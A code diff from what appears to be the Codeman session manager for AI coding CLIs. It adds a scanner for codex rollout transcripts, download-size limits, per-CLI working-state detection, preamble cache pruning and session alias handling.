await writeFile(join(casePath, AGENT_CASE_MARKER_FILE), `${body}\n`, 'utf-8');
return true;
} catch {
return false;
}
}
/** Read the marker out of `casePath`, or `null` if there isn't a valid one. */
export async function readAgentCaseMarker(casePath: string): Promise<AgentCaseMarker | null> {
try {
return parseAgentCaseMarker(await readFile(join(casePath, AGENT_CASE_MARKER_FILE), 'utf-8'));
} catch {
return null;
}
}
+393
View File
@@ -0,0 +1,393 @@
/**
* @fileoverview Scan `~/.codex/sessions/<yyyy>/<mm>/<dd>/rollout-*.jsonl` for Past
* Sessions rows, the codex analog of what `scanOmpSessionsHistory()`
* (omp-transcript.ts) does for omp and `scanProjectDir()` (session-routes.ts)
* does for Claude's own `~/.claude/projects` transcripts.
*
* Without this a codex conversation is invisible to Codeman the moment its
* session record goes away, even though codex itself never forgot it: the
* unified list is built from `~/.claude/projects` plus omp's own store, and
* codex writes to neither. A user who wanted to pick a codex thread back up had
* to find its id by hand and pass `codexConfig.resumeSessionId` to the API.
*
* ## Why this reads windows rather than whole files
*
* An omp session file is the conversation only, so its scanner reads each file
* whole. A codex rollout is not comparable: it carries every reasoning block and
* every tool call, and its `session_meta` line alone embeds the full base
* instructions. Measured on a real store of 519 rollouts, the median file is
* 407 KiB, the 90th percentile 1.3 MiB and the largest 25 MiB, for 381 MiB in
* total. So this reads a head window for the identity and the opening prompt,
* and a tail window for the most recent one.
*
* The head budget is 128 KiB because `session_meta` runs to roughly 19 KiB and
* the first real user message lands near 69 KiB behind it, both measured on
* codex 0.152.1.
*
* ## Where the prompt text comes from
*
* Codex has emitted user input under three shapes, and this reads all of them,
* preferring the ones that carry real input only:
*
* - `event_msg` / `item_completed` with an `item.type` of `UserMessage`, which
* is what codex 0.152.1 writes.
* - `event_msg` / `user_message`, which older versions wrote.
* - `response_item` rows with `role: 'user'`, the last resort. These mix real
* input with injected context (AGENTS.md, environment context, compaction
* summaries), so they are read only when neither shape above appears, and
* the obvious injections are dropped.
*
* @module codex-transcript
*/
import { open, readdir, stat } from 'node:fs/promises';
import { homedir } from 'node:os';
import { join } from 'node:path';
import { LRUMap } from './utils/lru-map.js';
/** Covers `session_meta` (~19 KiB) plus the first user message (~69 KiB behind it). */
const HEAD_BYTES = 131072;
/** Enough to hold the last few turns' worth of lines without re-reading the file. */
const TAIL_BYTES = 65536;
/**
* Newest rollouts to REPORT. Counted in emitted rows, not files scanned: the
* store is mostly sub-agent threads this never returns, so capping files first
* would spend the budget on rows nobody sees.
*/
const MAX_ROLLOUTS = 400;
/**
* How many emitted rows also get a tail read for `lastPrompt`. The head read is
* cached (see below) but the tail cannot be, because appending to a rollout is
* exactly what changes it, so this is the one genuinely per-request cost and it
* stays bounded. Counted in emitted rows for the same reason as above — against
* file index a store of sub-agent threads spends the whole budget before the
* first row that needed it.
*/
const MAX_TAIL_READS = 100;
/** Directory nesting under `sessions/` is year/month/day; stop well past that. */
const MAX_WALK_DEPTH = 5;
/** A rollout shorter than this cannot hold a complete `session_meta` line. */
const MIN_ROLLOUT_BYTES = 100;
export interface CodexHistorySession {
/** The rollout's own thread id — the token `codex resume <id>` expects. */
sessionId: string;
/**
* `session_meta.originator`, which codex stamps from
* CODEX_INTERNAL_ORIGINATOR_OVERRIDE — `codeman_<sessionId>` for every pane
* Codeman spawns. The only link between a FRESH codex pane and the rollout it
* is writing, since such a pane knows no thread id of its own.
*/
originator?: string;
workingDir: string;
sizeBytes: number;
/** ISO timestamp, from the file's own mtime. */
lastModified: string;
firstPrompt?: string;
lastPrompt?: string;
}
/** The half of a rollout that never changes once codex has written it. */
interface RolloutIdentity {
threadId?: string;
cwd?: string;
/** `'subagent'` marks a thread codex spawned for itself. */
threadSource?: string;
/** `codeman_<sessionId>` for a pane Codeman spawned; codex's own default otherwise. */
originator?: string;
firstPrompt?: string;
}
/**
* `session_meta` is written once and never rewritten — the same fact
* `readCodexRolloutMetaCached()` in session-routes.ts relies on — so a path's
* identity is cached, and a rescan costs a `stat` per file plus head reads for
* rollouts this process has not seen before.
*
* ⚠️ The first user message is NOT written up front: codex writes it when the
* user submits. Caching before then pins `firstPrompt: undefined` for the life
* of the process, and every scan of the home screen, the command palette and the
* search-index refresh can land in that window — so the row reads as having no
* prompt until a restart. `shouldCacheIdentity()` is the guard.
*
* Bounded, unlike a plain Map: this process runs for days and every sub-agent
* rollout adds an entry. Same reason and same size as `codexRolloutMetaCache`.
*/
const identityCache = new LRUMap<string, RolloutIdentity>({ maxSize: 4096 });
/**
* Is this identity settled enough to keep?
*
* A known `firstPrompt` settles it. So does a head read that FILLED its window,
* which means the prompt is genuinely not in the first `HEAD_BYTES` rather than
* not written yet. A short file with no prompt is the ambiguous case — codex is
* still to write one — so that one is re-read next scan.
*/
function shouldCacheIdentity(identity: RolloutIdentity, fileSize: number): boolean {
if (!identity.threadId) return false;
return identity.firstPrompt !== undefined || fileSize >= HEAD_BYTES;
}
function codexSessionsRoot(): string {
const home = process.env.CODEX_HOME || join(homedir(), '.codex');
return join(home, 'sessions');
}
/** Read at most `bytes` from the front of a file. Returns '' when unreadable. */
async function readHead(path: string, bytes: number): Promise<string> {
const fh = await open(path, 'r').catch(() => null);
if (!fh) return '';
try {
const buf = Buffer.alloc(bytes);
const { bytesRead } = await fh.read(buf, 0, bytes, 0);
return buf.subarray(0, bytesRead).toString('utf-8');
} catch {
return '';
} finally {
await fh.close().catch(() => {});
}
}
/**
* Read at most `bytes` from the end of a file, dropping the leading partial
* line so every line handed back parses.
*/
async function readTail(path: string, size: number, bytes: number): Promise<string> {
const fh = await open(path, 'r').catch(() => null);
if (!fh) return '';
try {
const want = Math.min(bytes, size);
const buf = Buffer.alloc(want);
const { bytesRead } = await fh.read(buf, 0, want, size - want);
const text = buf.subarray(0, bytesRead).toString('utf-8');
if (want >= size) return text; // whole file, nothing was cut
const nl = text.indexOf('\n');
return nl === -1 ? '' : text.slice(nl + 1);
} catch {
return '';
} finally {
await fh.close().catch(() => {});
}
}
/** Flatten codex's message content, which is a string or an array of text blocks. */
function contentText(content: unknown): string {
if (typeof content === 'string') return content.trim();
if (!Array.isArray(content)) return '';
return content
.filter(
(b): b is { text: string } => !!b && typeof b === 'object' && typeof (b as { text?: unknown }).text === 'string'
)
.map((b) => b.text)
.join('\n')
.trim();
}
/** One line's user-prompt text, whichever of the three shapes it is. */
function userPromptFromLine(entry: {
type?: string;
payload?: {
type?: string;
role?: string;
content?: unknown;
message?: unknown;
item?: { type?: string; content?: unknown };
};
}): { text: string; injectionProne: boolean } | null {
const p = entry.payload;
if (!p) return null;
if (entry.type === 'event_msg' && p.type === 'item_completed' && p.item?.type === 'UserMessage') {
const text = contentText(p.item.content);
return text ? { text, injectionProne: false } : null;
}
if (entry.type === 'event_msg' && p.type === 'user_message') {
const text = typeof p.message === 'string' ? p.message.trim() : contentText(p.message);
return text ? { text, injectionProne: false } : null;
}
if (entry.type === 'response_item' && p.role === 'user') {
const text = contentText(p.content);
return text ? { text, injectionProne: true } : null;
}
return null;
}
/**
* Injected context rather than something the user typed. Codex prepends the
* repository's AGENTS.md and wraps environment context in a tag, and both arrive
* as `response_item` user rows.
*/
function isInjectedContext(text: string): boolean {
return text.startsWith('#') || text.startsWith('<');
}
/** Collapse to one line and cap, so a row carries a title rather than an essay. */
function asPreview(text: string): string {
const flat = text.replace(/\s+/g, ' ').trim();
return flat.length > 200 ? `${flat.slice(0, 200)}…` : flat;
}
/** Parse a head window into the facts about a rollout that never change. */
function parseIdentity(head: string): RolloutIdentity {
const out: RolloutIdentity = {};
let fallback: string | undefined;
for (const line of head.split('\n')) {
if (!line) continue;
let entry: {
type?: string;
payload?: {
id?: string;
session_id?: string;
cwd?: string;
thread_source?: string;
originator?: string;
type?: string;
role?: string;
content?: unknown;
message?: unknown;
item?: { type?: string; content?: unknown };
};
};
try {
entry = JSON.parse(line);
} catch {
continue; // truncated tail of the window, or a malformed line
}
const p = entry.payload;
if (entry.type === 'session_meta' && p) {
out.threadId ??= p.id || p.session_id;
out.cwd ??= p.cwd;
out.threadSource ??= p.thread_source;
out.originator ??= p.originator;
} else if (entry.type === 'turn_context' && p) {
out.cwd ??= p.cwd;
}
if (out.firstPrompt) continue;
const prompt = userPromptFromLine(entry);
if (!prompt) continue;
if (!prompt.injectionProne) {
out.firstPrompt = asPreview(prompt.text);
} else if (!fallback && !isInjectedContext(prompt.text)) {
fallback = asPreview(prompt.text);
}
}
out.firstPrompt ??= fallback;
return out;
}
/** The most recent user prompt in a tail window, or undefined. */
function parseLastPrompt(tail: string): string | undefined {
let best: string | undefined;
let fallback: string | undefined;
for (const line of tail.split('\n')) {
if (!line) continue;
try {
const prompt = userPromptFromLine(JSON.parse(line));
if (!prompt) continue;
if (!prompt.injectionProne) best = asPreview(prompt.text);
else if (!isInjectedContext(prompt.text)) fallback = asPreview(prompt.text);
} catch {
// Malformed line — keep scanning.
}
}
return best ?? fallback;
}
/** Every rollout file under `sessions/`, newest first. */
async function listRollouts(root: string): Promise<Array<{ path: string; mtimeMs: number; size: number }>> {
const files: Array<{ path: string; mtimeMs: number; size: number }> = [];
const walk = async (dir: string, depth: number): Promise<void> => {
if (depth > MAX_WALK_DEPTH) return;
const entries = await readdir(dir, { withFileTypes: true }).catch(() => null);
if (!entries) return;
for (const entry of entries) {
const full = join(dir, entry.name);
if (entry.isDirectory()) {
await walk(full, depth + 1);
continue;
}
if (!entry.isFile() || !entry.name.endsWith('.jsonl')) continue;
const st = await stat(full).catch(() => null);
if (!st || st.size < MIN_ROLLOUT_BYTES) continue;
files.push({ path: full, mtimeMs: st.mtimeMs, size: st.size });
}
};
await walk(root, 0);
files.sort((a, b) => b.mtimeMs - a.mtimeMs);
return files;
}
/**
* Codex conversations on this host, newest first, for the unified session list.
*
* Sub-agent threads are left out: codex spawns them for itself, they are not
* something a person picks back up, and on a real store they outnumber the
* threads that are.
*/
export async function scanCodexSessionsHistory(): Promise<CodexHistorySession[]> {
const files = await listRollouts(codexSessionsRoot());
const out: CodexHistorySession[] = [];
for (const file of files) {
if (out.length >= MAX_ROLLOUTS) break;
let identity = identityCache.get(file.path);
if (!identity) {
identity = parseIdentity(await readHead(file.path, HEAD_BYTES));
if (shouldCacheIdentity(identity, file.size)) identityCache.set(file.path, identity);
}
if (!identity.threadId || identity.threadSource === 'subagent') continue;
// A row with no directory has nowhere to resume INTO, and emitting an empty
// one makes a click post `workingDir: ''`. omp drops such a row; so does this.
if (!identity.cwd) continue;
const lastPrompt =
out.length < MAX_TAIL_READS ? parseLastPrompt(await readTail(file.path, file.size, TAIL_BYTES)) : undefined;
out.push({
sessionId: identity.threadId,
originator: identity.originator,
workingDir: identity.cwd,
sizeBytes: file.size,
lastModified: new Date(file.mtimeMs).toISOString(),
firstPrompt: identity.firstPrompt,
lastPrompt: lastPrompt ?? identity.firstPrompt,
});
}
return out;
}
/**
* Which codex thread each Codeman-spawned pane is writing, keyed by Codeman
* session id.
*
* Codeman spawns every codex pane with
* CODEX_INTERNAL_ORIGINATOR_OVERRIDE=codeman_<sessionId>, and codex stamps that
* into `session_meta.originator`. That is the ONLY link between a fresh codex
* pane and the rollout it is writing: such a pane knows no thread id of its own,
* so it cannot be folded into its own Past-Sessions row from its own side.
*
* Newest wins. `/new` typed inside the codex TUI leaves several rollouts sharing
* one originator, and the pane is on the most recent — so this expects `rows`
* newest-first, as `scanCodexSessionsHistory()` returns them.
*/
export function codexThreadBySessionId(rows: CodexHistorySession[]): Map<string, string> {
const out = new Map<string, string>();
for (const row of rows) {
const owner = /^codeman_(.+)$/.exec(row.originator ?? '')?.[1];
if (owner && !out.has(owner)) out.set(owner, row.sessionId);
}
return out;
}
/** Test seam: drop the per-path identity cache. */
export function __clearCodexIdentityCache(): void {
identityCache.clear();
}
+47
View File
@@ -112,3 +112,50 @@ export const FILE_PEEK_BYTES = 8 * 1024 - 1; // 8KB (inclusive end offset)
* Override: CODEMAN_MAX_PASTE_IMAGE_BYTES (bytes)
*/
export const MAX_PASTE_IMAGE_BYTES = parseInt(process.env.CODEMAN_MAX_PASTE_IMAGE_BYTES || '') || 50 * 1024 * 1024; // 50MB
// ============================================================================
// File Download Limits
// ============================================================================
/**
* Parse a byte-limit env var, where `0` explicitly means "no limit".
*
* The `parseInt(...) || default` idiom used elsewhere in this file cannot
* express that: it treats 0 as falsy and silently restores the default.
*/
function parseByteLimitEnv(raw: string | undefined, fallback: number): number {
if (raw === undefined || raw.trim() === '') return fallback;
const parsed = Number.parseInt(raw, 10);
if (!Number.isFinite(parsed) || parsed < 0) return fallback;
return parsed;
}
/**
* Maximum size (bytes) of a file served by the raw/download file routes:
* `GET /api/sessions/:id/file-raw` (the Files panel's download link and the
* file-preview overlay), the attachment `/raw` route, and `GET /api/download`.
*
* ⚠️ This is a sanity bound, NOT memory protection. All three bodies are
* STREAMED and `Range`-aware (`sendFileBody` in file-routes.ts), so a large
* file costs one read stream rather than its size in RSS. The historical 50MB
* cap predates that streaming rewrite and its "prevent memory exhaustion"
* comment described a `readFile()` that no longer exists — all it did was
* refuse legitimate downloads of build artifacts, videos and archives.
*
* Set `CODEMAN_MAX_DOWNLOAD_BYTES=0` to remove the cap entirely.
* Override: CODEMAN_MAX_DOWNLOAD_BYTES (bytes)
*/
export const MAX_FILE_DOWNLOAD_BYTES = parseByteLimitEnv(
process.env.CODEMAN_MAX_DOWNLOAD_BYTES,
2 * 1024 * 1024 * 1024 // 2GB
);
/** True when `size` exceeds the download cap (a cap of 0 means unlimited). */
export function exceedsDownloadLimit(size: number): boolean {
return MAX_FILE_DOWNLOAD_BYTES > 0 && size > MAX_FILE_DOWNLOAD_BYTES;
}
/** Human-readable "File too large (…)" message for a refused download. */
export function downloadTooLargeMessage(size: number): string {
return `File too large (${Math.round(size / 1024 / 1024)}MB > ${Math.round(MAX_FILE_DOWNLOAD_BYTES / 1024 / 1024)}MB limit). Raise or remove it with CODEMAN_MAX_DOWNLOAD_BYTES (0 = unlimited).`;
}
+18 -1
View File
@@ -13,7 +13,7 @@
*/
import { z } from 'zod';
import { TOKEN_PATTERNS } from './patterns.js';
import { compileVersionRegex, TOKEN_PATTERNS } from './patterns.js';
import { isKnownLauncherProfile, isKnownSetenvProfile } from './profiles.js';
/** A bare CLI id: lowercase, starts with a letter, at most 24 chars. Also used as a CSS/URL token. */
@@ -274,6 +274,23 @@ const capabilitiesSchema = z
effort: z.boolean(),
agentSkillInjection: z.boolean(),
statusLineTelemetry: z.boolean(),
workDetect: z
.object({
promptGlyph: z.string().min(1).max(8),
// Config-supplied regex, so it goes through the same guard as `version.regex`:
// ~/.codeman/clis.json can set this, and the compiled pattern runs on the PTY
// hot path, where a nested quantifier would be a ReDoS against the event loop.
// A broken pattern must also fail at LOAD time rather than inside a data handler.
workingLine: z
.string()
.min(1)
.refine(
(src) => compileVersionRegex(src) !== null,
'workingLine must be a regex compileVersionRegex() accepts: at most 200 characters, no nested quantifiers'
),
})
.strict()
.optional(),
model: z
.object({ source: z.enum(['flag', 'claude-settings-file', 'none']), param: z.string().optional() })
.strict(),
+12
View File
@@ -183,6 +183,13 @@ const CLAUDE: CliEntry = {
},
capabilities: {
external: false,
// The historical hard-coded pair, now stated as data. `workingLine` matches both the
// `✻ Actualizing… (39s · ↓ 2.0k tokens)` status line and the bare `esc to interrupt`
// footer, because tmux repaints partially and only one of the two may land in a chunk.
workDetect: {
promptGlyph: '❯',
workingLine: String.raw`…\s*\((?:\d+h\s+)?(?:\d+m\s+)?\d+s\b|esc to interrupt`,
},
requiresMux: false,
// Claude installs Codeman's own hooks block into every workspace it runs in, so its
// stop/idle signals are unconditional — no per-session veto, unlike deepseek's bridge.
@@ -418,6 +425,11 @@ const CODEX: CliEntry = {
},
capabilities: {
...agentDefaults(),
// Codex draws `› Ask Codex to do anything` on its composer row and
// `Working (2m 49s • esc to interrupt)` above it while a turn runs. It animates no
// braille spinner, and it never prints `esc to interrupt` at rest, so that phrase
// alone separates a running turn from an idle one.
workDetect: { promptGlyph: '›', workingLine: '[Ee]sc to interrupt' },
transcript: 'codex-rollout',
altScreen: 'strip-full',
echo: { policy: 'predict', anchor: { kind: 'cursor' }, predictProfile: 'codex' },
+23
View File
@@ -306,6 +306,29 @@ export interface CliCapabilities {
* independent — see this interface's own doc comment.
*/
external: boolean;
/**
* How to read this CLI's own TUI for whether it is mid-turn.
*
* Codeman infers a working agent from the pane, so the two strings it needs are the
* ones that differ per CLI: the glyph on the composer row, and the status line the CLI
* draws while a turn runs. Holding them here is what lets a non-Claude CLI report work
* at all — `external` used to gate the whole detector, so every external CLI reported
* itself permanently idle even mid-turn.
*
* `promptGlyph` only ARMS the idle confirmation and is never on its own evidence that a
* turn ended, because a CLI redraws its composer throughout a turn. `workingLine` is
* the evidence, and `_confirmIdle` consults it before believing the pane went quiet.
*
* An entry that omits this field keeps Codeman's historical behaviour: the Claude glyph
* arms the confirmation and the Claude working line answers it. Leave it out for a CLI
* whose TUI nobody has characterised, and its sessions report work exactly as before.
*/
workDetect?: {
/** The glyph this CLI draws on its composer row, e.g. Claude's `❯`, Codex's `›`. */
promptGlyph: string;
/** Source of a regex matching the status line this CLI draws while a turn runs. */
workingLine: string;
};
/** No direct-PTY fallback: the CLI must run inside tmux (secrets ride tmux setenv). */
requiresMux: boolean;
/**
+74 -3
View File
@@ -1066,9 +1066,80 @@ export async function installAgentSkillInto(skillDir: string): Promise<AgentSkil
*/
export async function seedAgentSessionPreamble(sessionId: string): Promise<void> {
const content = await readFile(join(agentSkillSourceDir(), 'preamble.sh'), 'utf-8');
const cacheDir = process.env.XDG_CACHE_HOME || join(homedir(), '.cache');
await mkdir(cacheDir, { recursive: true });
await writeFile(join(cacheDir, `codeman-agent-${sessionId}.sh`), content, { mode: 0o600 });
await mkdir(agentPreambleCacheDir(), { recursive: true });
await writeFile(agentPreamblePath(sessionId), content, { mode: 0o600 });
}
/** Where the preamble caches live. One formula, shared by seed / remove / prune. */
function agentPreambleCacheDir(): string {
return process.env.XDG_CACHE_HOME || join(homedir(), '.cache');
}
/** `codeman-agent-<sessionId>.sh` in that directory. */
function agentPreamblePath(sessionId: string): string {
return join(agentPreambleCacheDir(), `codeman-agent-${sessionId}.sh`);
}
/** Matches exactly what seedAgentSessionPreamble writes, and nothing else in ~/.cache. */
const AGENT_PREAMBLE_FILE_PATTERN = /^codeman-agent-(.+)\.sh$/;
/** How long a preamble cache with no live session behind it is kept before the sweep takes it. */
export const AGENT_PREAMBLE_MAX_AGE_MS = 7 * 24 * 60 * 60 * 1000;
/**
* Drop one session's preamble cache. Called when a session is deleted, which is the
* precise counterpart to seeding it at create: one file per claude session was being
* written and nothing ever removed them (236 leftovers measured on a working machine,
* the oldest three weeks old). Best-effort — a file that will not delete is litter,
* never a reason to fail a teardown.
*/
export async function removeAgentSessionPreamble(sessionId: string): Promise<void> {
await unlink(agentPreamblePath(sessionId)).catch(() => {});
}
/**
* Sweep preamble caches left by sessions that are gone: the delete path above covers
* an orderly teardown, and this covers everything else (a crash, a killed server, a
* session deleted by an older build, another instance's leftovers).
*
* ⚠️ Two guards, and both matter: a file whose session is in `keepSessionIds` is never
* touched however old it is, and everything else needs `maxAgeMs` of age on top. A live
* session's cache is load-bearing — remove it and the skill's two-line loader fails its
* version check mid-run — and the age floor is what keeps a session belonging to
* ANOTHER instance (whose ids this process cannot see) out of the blast radius. Losing
* one is degradation rather than breakage: the §0 fallback block rewrites it.
*
* Returns how many it removed. Best-effort throughout; a missing cache dir is 0.
*/
export async function pruneAgentSessionPreambles(
keepSessionIds: Iterable<string>,
maxAgeMs: number = AGENT_PREAMBLE_MAX_AGE_MS
): Promise<number> {
const cacheDir = agentPreambleCacheDir();
const keep = new Set(keepSessionIds);
const cutoff = Date.now() - maxAgeMs;
let removed = 0;
let entries: string[];
try {
entries = await readdir(cacheDir);
} catch {
return 0;
}
for (const entry of entries) {
const sessionId = AGENT_PREAMBLE_FILE_PATTERN.exec(entry)?.[1];
if (!sessionId || keep.has(sessionId)) continue;
const path = join(cacheDir, entry);
try {
if ((await lstat(path)).mtimeMs > cutoff) continue;
await unlink(path);
removed++;
} catch {
/* best-effort — a vanished or unreadable file is not our problem */
}
}
return removed;
}
/**
+6 -1
View File
@@ -137,7 +137,12 @@ export interface RespawnPaneOptions {
/** Options for pane buffer capture (COD-47 full-history mode). */
export interface PaneCaptureOptions {
/** Capture the entire tmux scrollback instead of just the visible frame. */
/**
* Capture the entire scrollback instead of just the visible frame, as linear
* text ending with a cursor move back to the pane's caret position. An
* implementation returns '' when the pane holds nothing visible, which the
* caller reads as "nothing to replay" and keeps its existing history.
*/
fullHistory?: boolean;
/** Bound the full-history capture to this many scrollback lines (`-S -<N>`). */
historyLimitLines?: number;
+29 -10
View File
@@ -2,12 +2,16 @@
* @fileoverview Pure merge/filter logic for the unified session list (COD-121).
*
* Combines four read-only views of a session — live (in-memory `Session`),
* persisted (`state.json`), transcript history (`~/.claude/projects`), and the
* lifecycle audit log — plus mux process stats, into one de-duplicated list
* keyed by sessionId. Transcript-history rows are keyed by the Claude
* conversation UUID (the `.jsonl` filename stem), which diverges from the
* Codeman id for resumed sessions — an alias map (claudeSessionId → Codeman id,
* built from the live/persisted views) folds them into the owning session item.
* persisted (`state.json`), transcript history, and the lifecycle audit log —
* plus mux process stats, into one de-duplicated list keyed by sessionId.
*
* Transcript history is not one source but three, because the CLIs keep their
* conversations in their own stores: Claude's `~/.claude/projects`, omp's
* `~/.omp/agent/sessions` and codex's `~/.codex/sessions`. Each row is keyed by
* whatever id that CLI names the conversation with, which diverges from the
* Codeman id for a resumed session and for every non-Claude one — an alias map
* (claudeSessionId → Codeman id, built from the live/persisted views) folds them
* into the owning session item.
* Higher-precedence sources overwrite scalar fields when present
* (history < lifecycle < persisted < live), while the `sources` array
* always accumulates every contributing view. A "meaningfulness floor" drops
@@ -39,6 +43,11 @@ export type UnifiedSessionItem = {
/** Main repo root a worktree belongs to (#266). */
worktreeRepo?: string;
remote?: boolean;
/**
* Token this row's CLI resumes by, when that is not `sessionId`. Set only from
* a transcript scanner — see the field of the same name on `HistoryInput`.
*/
resumeId?: string;
/** Pinned to the top of the session manager list (COD-139). */
pinned?: boolean;
/** When the session was pinned (epoch ms) — orders the pinned group desc. */
@@ -100,12 +109,21 @@ export type HistoryInput = {
worktreeName?: string;
worktreeRepo?: string;
/**
* Set only by a non-claude transcript source (currently omp); the Claude
* scanner never stamps this; the meaningfulness floor below still counts a
* row with a `mode` as real, since that also signals "not claude" — see
* where it's read below for the isReal check this touches.
* Set only by a non-claude transcript source (currently omp and codex); the
* Claude scanner never stamps this; the meaningfulness floor below still
* counts a row with a `mode` as real, since that also signals "not claude" —
* see where it's read below for the isReal check this touches.
*/
mode?: string;
/**
* The token this CLI's own resume command expects, when it is NOT the row's
* `sessionId`. Codex names a thread by an id of its own that lives in the
* rollout, and a live codex session's `sessionId` is Codeman's uuid instead —
* so a resume that reused `sessionId` would ask codex for a thread that does
* not exist. Only a transcript scanner sets this, which is what keeps the two
* kinds of row apart.
*/
resumeId?: string;
};
/** Mux process-stat view. */
@@ -186,6 +204,7 @@ export function mergeUnifiedSessions(sources: UnifiedSources): UnifiedSessionIte
// transcript source (currently only omp) does, so a history-only row
// still gets a mode badge instead of reading as claude by default.
overwrite(item, 'mode', h.mode);
overwrite(item, 'resumeId', h.resumeId);
const ms = Date.parse(h.lastModified);
if (!Number.isNaN(ms) && item.lastActivityAt === undefined) item.lastActivityAt = ms;
}
+90 -40
View File
@@ -106,6 +106,7 @@ import {
import { DEFAULT_TMUX_HISTORY_LIMIT } from './config/terminal-history.js';
import { EXEC_TIMEOUT_MS } from './config/exec-timeout.js';
import { getCli } from './config/cli-registry/registry.js';
import { compileVersionRegex } from './config/cli-registry/patterns.js';
import { resolveSessionCliVersion } from './utils/cli-resolver.js';
import {
buildInteractiveArgs,
@@ -481,6 +482,8 @@ export class Session extends EventEmitter {
private _activityStreak: ActivityStreak | null = null; // Unbroken run of PTY repaints (working detection)
private _lastPaneProbeAt = 0; // Throttle for the tmux screen probe
private _lastPaneProbeWorking: boolean | null = null; // Its last verdict (null = could not read)
/** Lazily compiled `capabilities.workDetect.workingLine`. See _workingLinePattern(). */
private _workingLineRe: RegExp | undefined = undefined;
private _trustDialogAccepted: boolean = false; // Stops the trust-dialog scan (answered, or given up)
private _trustDialogAttempts = 0; // Keystrokes sent at the trust dialog
private _lastTrustDialogScanAt = 0; // Throttle for the trust-dialog screen read
@@ -721,13 +724,20 @@ export class Session extends EventEmitter {
this._wireActivityAt = config.lastActivityAt || Date.now();
this._wireActivitySettleUntil = config.lastActivityAt ? Date.now() + WIRE_ACTIVITY_SETTLE_MS : 0;
// Set claudeSessionId — when resuming, the Claude conversation ID is the resumed one.
// For omp, `claudeSessionId` doubles as the generic "external transcript id"
// alias key mergeUnifiedSessions() folds a history row into its owning
// session by: omp mints its OWN uuid, unrelated to this Codeman id, so
// without this an omp conversation's Past-Sessions row (keyed by omp's
// id) would never merge with its own live/persisted row (keyed by this
// id) — it would just show up a second time.
this._claudeSessionId = config.resumeSessionId || config.ompConfig?.resumeSessionId || this.id;
// For omp and codex, `claudeSessionId` doubles as the generic "external
// transcript id" alias key mergeUnifiedSessions() folds a history row into
// its owning session by: each mints its OWN thread id, unrelated to this
// Codeman id, so without this the conversation's Past-Sessions row (keyed by
// that thread id) would never merge with its own live/persisted row (keyed
// by this id) — it would just show up a second time. For codex a duplicate
// is worse than cosmetic: the stale row still resumes, so clicking it starts
// a SECOND `codex resume` on a thread already open in another pane.
//
// This covers a RESUMED codex session, which knows its thread id up front. A
// fresh one learns its id only once codex writes the rollout, so it is folded
// from the other side — see the originator stamping in `gatherUnifiedInputs()`.
this._claudeSessionId =
config.resumeSessionId || config.ompConfig?.resumeSessionId || config.codexConfig?.resumeSessionId || this.id;
// Restored from state.json on boot recovery. start() resets _claudeSessionId
// to the launch id even when re-attaching to a mux session whose CLI has
// moved on (a `/clear` before the restart), so this anchor is what lets the
@@ -2065,16 +2075,23 @@ export class Session extends EventEmitter {
// this to omp's own session uuid — that already-resolved id must win
// over the generic `this.id` fallback, or this line clobbers it back
// to the Codeman id
// on every single respawn.
// on every single respawn. codex needs the same fallback for the same
// reason: its thread id lives in `_codexConfig`, so without it every
// respawn drops a resumed codex session's alias and its Past-Sessions
// row springs back as a duplicate that still resumes.
// ⚠️ A RESTORED mux session is the one case where the launch id is a
// lie: the CLI never stopped, so a `/clear` before the Codeman restart
// already moved it to a conversation `this.id` knows nothing about. The
// persisted chain's tail is that conversation, reported first-hand by
// the CLI's own hook, so it outranks the fallback here. A NEW pane has
// an empty chain and falls through to exactly today's expression.
// the CLI's own hook, so it outranks every fallback here. A NEW pane has
// an empty chain and falls through to the resume/alias fallbacks.
restoredConversation = isRestored ? this._claudeSessionChain[this._claudeSessionChain.length - 1] : undefined;
this._claudeSessionId =
restoredConversation || this._resumeSessionId || this._ompConfig?.resumeSessionId || this.id;
restoredConversation ||
this._resumeSessionId ||
this._ompConfig?.resumeSessionId ||
this._codexConfig?.resumeSessionId ||
this.id;
// For NEW mux sessions: wait for readiness then clean buffer
// For RESTORED mux sessions: don't do anything - client will fetch buffer on tab switch
@@ -2175,15 +2192,19 @@ export class Session extends EventEmitter {
// Set claudeSessionId — when resuming, the Claude conversation ID is the resumed one.
// Mirrors the mux branch above and must not clobber it: this line runs
// unconditionally after both the mux and direct-PTY paths, so it also needs
// the ompConfig fallback or it stomps the mux branch's correctly-resolved
// OMP alias back to this.id on every mux/plain-reattach boot recovery
// (the "third reset point" — see DECISIONS.md). For the same reason it needs
// `restoredConversation`: on a RESTORED mux attach the CLI never stopped and
// may have `/clear`ed before the restart, so the launch id is a lie and the
// chain's tail is the live conversation. Empty on every other path, which
// leaves this expression exactly as it was.
// the ompConfig and codexConfig fallbacks or it stomps the mux branch's
// correctly-resolved OMP/codex alias back to this.id on every mux/plain-
// reattach boot recovery (the "third reset point" — see DECISIONS.md).
// For the same reason it needs `restoredConversation`: on a RESTORED mux
// attach the CLI never stopped and may have `/clear`ed before the restart,
// so the launch id is a lie and the chain's tail is the live conversation.
// It is empty on every other path, so those paths keep the alias chain.
this._claudeSessionId =
restoredConversation || this._resumeSessionId || this._ompConfig?.resumeSessionId || this.id;
restoredConversation ||
this._resumeSessionId ||
this._ompConfig?.resumeSessionId ||
this._codexConfig?.resumeSessionId ||
this.id;
this._pid = this.ptyProcess.pid;
console.log('[Session] Interactive PTY spawned with PID:', this._pid);
@@ -2388,12 +2409,14 @@ export class Session extends EventEmitter {
* @param data raw PTY chunk, ANSI included
*/
private _detectInteractiveActivity(data: string): void {
// The prompt line contains "❯" when Claude is waiting for input. It only ARMS
// the check and is NOT evidence the turn ended: Claude redraws the composer
// about once a second all the way through a turn, which is exactly how a
// working session used to flip to idle two seconds in. _confirmIdle() waits
// for the pane to actually go quiet before believing it.
if (data.includes('❯')) {
const workDetect = getCli(this.mode)?.capabilities.workDetect;
// The composer row carries this glyph when the CLI is waiting for input. It only
// ARMS the check and is NOT evidence the turn ended: a CLI redraws its composer
// about once a second all the way through a turn, which is exactly how a working
// session used to flip to idle two seconds in. _confirmIdle() waits for the pane to
// actually go quiet before believing it. A CLI that declares no glyph keeps Claude's,
// which is the glyph every such session has been armed by until now.
if (data.includes(workDetect?.promptGlyph ?? '❯')) {
// Only start a new timeout if we're not already awaiting idle confirmation.
// This prevents status bar redraws (which include the prompt) from resetting it.
if (!this._awaitingIdleConfirmation) {
@@ -2412,9 +2435,10 @@ export class Session extends EventEmitter {
// new status line does not rescue it either (tmux repaints partially, so the
// complete line reaches the PTY only every few tens of seconds). An unbroken run
// of repaints is the signal that survives. See session-activity.ts for the
